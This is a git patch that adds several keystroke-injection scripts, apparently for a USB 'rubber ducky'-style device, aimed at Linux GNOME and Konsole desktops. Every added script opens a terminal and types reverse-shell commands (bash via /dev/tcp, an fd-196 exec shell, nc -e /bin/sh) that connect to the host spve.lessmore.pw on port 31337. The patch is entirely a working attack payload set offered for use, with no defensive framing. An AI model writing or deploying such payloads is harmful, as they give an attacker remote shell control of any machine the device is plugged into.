From 29013e69eaf6e33ac59a85a7bd758197d6c0eff5 Mon Sep 17 00:00:00 2001 From: Denis Zheleztsov Date: Thu, 22 Aug 2024 11:53:13 +0300 Subject: [PATCH] All --- linux-gnome-bash.txt | 12 ++++++++++++ linux.txt => linux-gnome.txt | 0 linux-konsole-bash.txt | 12 ++++++++++++ linux-konsole.txt | 8 ++++++++ 4 files changed, 32 insertions(+) create mode 100644 linux-gnome-bash.txt rename linux.txt => linux-gnome.txt (100%) create mode 100644 linux-konsole-bash.txt create mode 100644 linux-konsole.txt diff --git a/linux-gnome-bash.txt b/linux-gnome-bash.txt new file mode 100644 index 0000000..a21d4ce --- /dev/null +++ b/linux-gnome-bash.txt @@ -0,0 +1,12 @@ +ALT F2 +DELAY 500 +STRING gnome-terminal +DELAY 200 +ENTER +DELAY 5000 +STRING bash -i >& /dev/tcp/spve.lessmore.pw/31337 0>&1 +ENTER +STRING 0<&196;exec 196<>/dev/tcp/spve.lessmore.pw/31337; sh <&196 >&196 2>&196 +ENTER +STRING /bin/bash -l > /dev/tcp/spve.lessmore.pw/31337 0<&1 2>&1 +ENTER diff --git a/linux.txt b/linux-gnome.txt similarity index 100% rename from linux.txt rename to linux-gnome.txt diff --git a/linux-konsole-bash.txt b/linux-konsole-bash.txt new file mode 100644 index 0000000..6041508 --- /dev/null +++ b/linux-konsole-bash.txt @@ -0,0 +1,12 @@ +ALT F2 +DELAY 500 +STRING konsole +DELAY 200 +ENTER +DELAY 5000 +STRING bash -i >& /dev/tcp/spve.lessmore.pw/31337 0>&1 +ENTER +STRING 0<&196;exec 196<>/dev/tcp/spve.lessmore.pw/31337; sh <&196 >&196 2>&196 +ENTER +STRING /bin/bash -l > /dev/tcp/spve.lessmore.pw/31337 0<&1 2>&1 +ENTER diff --git a/linux-konsole.txt b/linux-konsole.txt new file mode 100644 index 0000000..219e9e2 --- /dev/null +++ b/linux-konsole.txt @@ -0,0 +1,8 @@ +ALT F2 +DELAY 500 +STRING konsole +DELAY 200 +ENTER +DELAY 5000 +STRING nc -e /bin/sh spve.lessmore.pw 31337 +ENTER